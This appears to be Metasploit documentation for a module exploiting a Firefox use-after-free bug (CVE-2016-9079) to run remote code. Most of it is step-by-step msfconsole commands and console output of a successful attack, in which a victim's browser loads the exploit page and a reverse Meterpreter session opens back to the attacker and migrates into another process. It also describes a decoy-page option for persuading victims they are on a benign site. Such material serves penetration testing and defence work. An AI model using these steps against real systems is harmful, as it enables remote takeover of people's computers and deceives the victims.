2.5 KiB
Mozilla Firefox is a free, open-source web browser developed and maintained by the Mozilla Foundation. Multiple versions are affected by a use-after-free vulnerability, detailed by CVE 2016-9079, that can result in arbitrary remote code execution.
Vulnerable Application
The vulnerability is present in all releases of Mozilla Firefox prior to 50.0.2
Firefox 38 through 41 were specifically chosen as targets for this module, though support for more releases is planned.
Usage
UsePostHTML module option
The module includes an option named UsePostHTML which is turned off by default. Setting this option to true will result in the module sending an HTML page to the target to be rendered after successful exploitation. This can be useful in convincing the target that they have arrived at a legitimate, benign website. If desired, please edit $datadirectory/exploits/firefox_smil_uaf/post.html to suit your needs. The included example file more than likely won't be suitable for your purposes.
Using firefox_smil_uaf
- Start msfconsole
- Do:
use exploit/windows/browser/firefox_smil_uaf
- Do:
set payload [PREFERRED PAYLOAD]
- Do:
set PAYLOAD [PAYLOAD NAME]
- Set payload options as needed
- Do:
run
, and have a target browse to the generated URL - Once a vulnerable target connects, you should receive a session like this:
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.79.132:6789
[*] Using URL: http://192.168.79.132:4567/lol
[*] Server started.
msf exploit(firefox_smil_uaf) > [*] 192.168.79.184 firefox_smil_uaf - Got request: /lol/
[*] 192.168.79.184 firefox_smil_uaf - From: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
[*] 192.168.79.184 firefox_smil_uaf - Sending exploit HTML ...
[*] 192.168.79.184 firefox_smil_uaf - Got request: /lol/worker.js
[*] 192.168.79.184 firefox_smil_uaf - From: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
[*] 192.168.79.184 firefox_smil_uaf - Sending worker thread Javascript ...
[*] Sending stage (957487 bytes) to 192.168.79.184
[*] Meterpreter session 1 opened (192.168.79.132:6789 -> 192.168.79.184:52341) at 2017-01-20 11:25:38 -0600
[*] Session ID 1 (192.168.79.132:6789 -> 192.168.79.184:52341) processing InitialAutoRunScript 'migrate -f'
[*] Running module against WIN-UTRINKNPT3D
[*] Current server process: firefox.exe (1448)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2572
[+] Successfully migrated to process 2572